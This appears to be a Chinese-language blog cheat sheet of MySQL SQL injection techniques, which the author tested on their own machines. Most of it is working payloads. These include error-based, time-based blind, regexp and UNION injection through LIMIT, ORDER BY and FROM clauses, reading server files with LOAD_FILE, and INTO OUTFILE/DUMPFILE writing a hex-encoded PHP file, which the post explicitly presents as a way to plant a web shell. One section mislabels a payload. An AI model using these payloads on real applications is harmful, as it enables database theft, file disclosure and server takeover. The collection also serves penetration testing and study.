[toc]

总结一波MySQL下各式各样等注入技巧~
Test Machine Configuration

OS:MacOS Mojave 10.14.2
MySQL: MySQL 5.7.19-log

测试表结构:
3dce7ef9e83548ddeb6643a6f075af4f

limit

Emmmm,测试失败了
翻了一些文章,发现limit之后的analyse() 只适用于MySQL server version <= 5.6.6

遂使用 Windows7 x64 + MySQL 5.5.53
26ef60fa552b1e2a9df1c06c0632111b

测试语句

1
SELECT username FROM user LIMIT {$uid},3;

Limit 注入主要是因为后面有一个 PROCEDURE analyse() 存储过程

构造报错注入

1
SELECT username FROM user  LIMIT 1,3 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

c4033dbc4df97e555bdc39638d337f21

因为5.5版本不能使用SELECT,所以只能获取一些配置信息等

exp

1
2
3
SELECT username FROM user  LIMIT 1,3 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

order by

测试语句:

1
SELECT * FROM user order by uid {evil};

  1. Order by + 报错注入
    69d7117a4def2cf4d7d50d4c44b6ae03
  1. order by + 时间盲注
    68c940c3c115e97f55fcc166249e6d0d

  2. order by + union查询
    8635b1761c56ebe9d5b6204f5581517d

此注入必须使用()包围SQL语句

  1. order by + regexp 盲注
    27b6b63f4a93c01d5f57ee0a75c7efea

这里解释一下语句
当正则未匹配到数据时候返回的结果是0 所以SQL语句相当于

1
select * from user order by uid ^ 0;

排序不变
5a9b7d8ee50c22ed35efa6fb7e90310d
exp

1
2
3
4
5
6
7
8
9
SELECT * FROM user ORDER BY uid and extractvalue(1,concat(0x3a,user()));

SELECT * FROM user ORDER BY uid and updatexml(1,concat(0x3a,user()),1);

select * from user order by uid ^(select (select version()) regexp '^aaaaaa');

select * from user order by uid,(select 1 from (select sleep(3))a);

(select * from user order by uid) union (select 1,(select version()),3,4);

from

测试语句

1
SELECT * FROM {$Tables};

直接嵌套子查询
37de6926a8a87e69f143bc5f7597342e

exp

版本限制: Version <= 5.5.5

1
2
3
select exp(~(select*from(select user())x));

insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'patrilic');

ExtractValue

1
Select * from user where uid = 1 and (extractvalue('String',(select user())));

extractvalue(target file,xml path)

53bb49c2016af886807088cd58c0709d
0e204a12a24b48d87710e60dc9b7a104

UpdateXml

1
Select * from user where uid = 1 and (updatexml('String',(Select user()),'String'));

updatexml(Target file,xml path,updateinfo)

0786dc9cffd391c4dc9aec2cad9bb334
b6cbf8fdd04c44eeaa03b702c00ed273

name_const

1
Select * from user where uid = 1 and (select name_const(version(),1),name_const(version(),1));

a02097ebcc3c66a348903385c2e09abf

name_const(‘1’, 14)
局限性很大

整数溢出报错注入

insert

1
Insert INTO user (uid,username,password,city) VALUES (?,?,?,?);

450be8fc5d042aa1d074506f7d5a93b7

f87586d1fd2bcc77a06870c63fd14f28

delect

1
DELETE FROM user WHERE uid={$uid};

fdf530943ba24e6ec996a845e0b939cb

update

1
UPDATE user SET password = {$password} Where username = {session.user} and uid = {session.uid}

dcae7f06664c4456708cfdd3159490e9
84d8c329a9ee3222c4c075648707d4e5

into outfile

主要用途:写shell
要求:

  • 要求用户具有file权限
  • 文件不能覆盖写入,所以文件必须为不存在
  • 如果secure_file_priv非空,则写入文件的目录只能为对应目录下

    into outfile + UNION

    1
    SELECT * FROM user WHERE uid = -1 union select 1,2,3,0x3c3f70687020706870696e666f28293b3f3e into outfile 'Y:/123.php';

bbeb09b67630a772e19b3b26e4f90b79

into outfile + LINES TERMINATED BY (limit)

1
select * from user order by uid limit 1,1 into outfile 'Y:/123.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e;

0313b6aaee866dee9ee0cc785bc89e7b

into outfile + FIELDS TERMINATED BY (limit)

1
select * from user order by uid limit 1,1 into outfile 'Y:/123.php' fields terminated by  0x3c3f70687020706870696e666f28293b3f3e;

922aaffeb4b239df59cf0ddbea8241a2

into outfile + LINES STARTING BY (limit)

1
select * from user order by uid limit 1,1 into outfile 'Y:/123.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e;

07ad0be0a19833ec877e9c7d77f0e0bc

load_file

主要用途:读文件
要求:

  • 要求用户具有file权限
  • 如果secure_file_priv非空,则只能读取对应目录下的文件

    load_file + UNION

    1
    select * from user where uid = -1 union select 1,2,3,(select load_file('Y:/123.php'));

fda87515edd1a870031c33556799b653

load_file + updatexml

1
select * from user  where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('Y:/123.php')),0x7e),0);

3b346d668d3dab3c2296330ac5421acd

load_file + extractive

1
select * from user where uid=-1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('Y:/1.php'))),0x7e)));

d068cdb2be5e81cf8ee618282fc0bb8f

load_file + isnull + updatexml

1
select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);

存在文件 返回0
不存在文件 返回1
d54a32ed2b31fc6fb134d7275f17eae8

Dumpfile

1
SELECT _utf8'Hello world!' INTO DUMPFILE 'Y:/world.php';

c5c1ec183eb4aba323bedb95d56f2100

不知道列名的注入

看原文比较好,直接复现一下
292940479295c820fe09ee52cc66aa61
aa99b8908afbca3697612a580cf940eb
9dbf0195c2217b9ae5bc52ca52e89fd6
232655760d9f318c95d8c69b68f1827f

Thanks

MySQLi Cookbook
lcamry’s blog
报错注入邂逅load_file&into outfile搭讪LINES
sqli-extracting-data-without-knowing-columns-name
wangyihang-sqli-labs-Script